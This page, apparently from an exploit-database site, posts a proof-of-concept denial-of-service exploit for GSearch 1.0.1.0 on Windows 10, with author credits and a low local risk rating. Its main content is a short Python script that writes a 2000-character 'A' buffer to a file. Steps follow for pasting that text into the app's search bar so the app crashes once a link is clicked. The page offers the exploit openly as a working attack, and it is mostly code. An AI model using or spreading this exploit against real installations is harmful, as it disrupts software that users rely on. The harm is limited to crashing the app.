GSearch 1.0.1.0 Denial Of Service

2019.06.25

Credit: 0xB9

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash
buffer = "A" * 2000
payload = buffer
try:
f = open("PoC.txt", "w")
print("[+] Creating payload..")
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

GSearch 1.0.1.0 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.